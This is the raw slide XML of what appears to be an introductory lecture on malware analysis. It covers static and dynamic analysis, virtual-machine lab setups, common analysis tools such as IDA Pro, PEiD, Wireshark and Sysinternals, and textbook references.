              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The sample is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>not executed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>monitor behaviour</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, it is the machine code in the binary file that is examined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>it may be very time consuming and it may be very </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>complex to perform.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>But static </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>analysis is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>…. safe.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Tools: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Disassemblers or Debuggers (IDA Pro / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>OllyDbg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>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248" y="5661248"/>
            <a:ext cx="7802328" cy="862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1247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Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Tips</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Briefly study a malware before go deeply into it  since most of malwares are complex and huge.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>There is no common approach for analysing of all malwares. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Different tools &amp; techniques provide different analysis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Different scenarios provides generate different analysis results.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Should do analysis by different ways and tools/techniques.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Tools/techniques vs. malwares evolution</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="94493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Environment</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Real: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>BootROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, Ghost, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Virtual: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>VMWare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>VirtualBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: Windows, Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Net Framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Java Runtime Environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Aspack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Udx</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>…..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, Firefox, PDF reader, Office,…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3920308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a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>IDA Pro: disassembler/debugger </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>OllyDbg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: disassembler/debugger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>PEview</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: file header analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Resource Hacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>PEiD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: File packer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>detector</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Dependency Walker: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>DLL explorer </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Wireshark: network protocol </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>analyzer</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Regshot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: Registry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Burp: proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ArpateDNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: DNS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>CheatEngine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>process memory </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4230323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a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>.Net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> Reflector: reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>.Net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>VirusTotal.com: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Malwr.com (Cuckoo Sandbox): automated malware analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Sysinternals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Suite, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Process Explorer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>(procexp.exe), Process Monitor (procmon.exe), Strings, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="910791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Surface Analysis	</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>www.virustotal .com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Packed or Obfuscated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PEiD</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>String contained</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Hashing check</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>md5deep </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1297959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Text-books</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="1196752"/>
            <a:ext cx="6767445" cy="5112568"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Michael Sikorski and Andrew </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Honig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Practical Malware Analysis: The Hands-on Guide to Dissecting Malicious Software</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”, No Starch Press, ISBN-10: 1-59327-290-1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dennis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Yurichev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reverse Engineering for Beginners</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”, 2013-2015.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Káº¿t quáº£ hÃ¬nh áº£nh cho Practical Malware Analysis: The Hands-on Guide to Dissecting Malicio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645" y="1124744"/>
            <a:ext cx="1835091" cy="242582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788" y="3874721"/>
            <a:ext cx="1823792" cy="25786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8949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Dynamic Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>VMWare</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>VirtualBox</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Parallels</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Virtual PC</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>QEMU</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3059911" y="1966697"/>
            <a:ext cx="5256584" cy="3825368"/>
            <a:chOff x="3131840" y="2627968"/>
            <a:chExt cx="5256584" cy="3825368"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3131840" y="2996952"/>
              <a:ext cx="5256584" cy="3456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491880" y="3284984"/>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7" name="Rectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3462288" y="4365104"/>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8" name="Rectangle 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3462288" y="5373216"/>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9" name="Rectangle 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6084168" y="3645024"/>
              <a:ext cx="2160240" cy="2448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480212" y="3861048"/>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11" name="Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6480212" y="4754286"/>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12" name="TextBox 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6701948" y="5607399"/>
              <a:ext cx="1095813" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                <a:t>Guest OS </a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="TextBox 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5538757" y="6074374"/>
              <a:ext cx="442750" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                <a:t>OS</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="TextBox 13"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6232204" y="3251548"/>
              <a:ext cx="1701107" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
                <a:t>Virtual machine</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="TextBox 14"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5256874" y="2627968"/>
              <a:ext cx="1815946" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
                <a:t>Physical machine</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
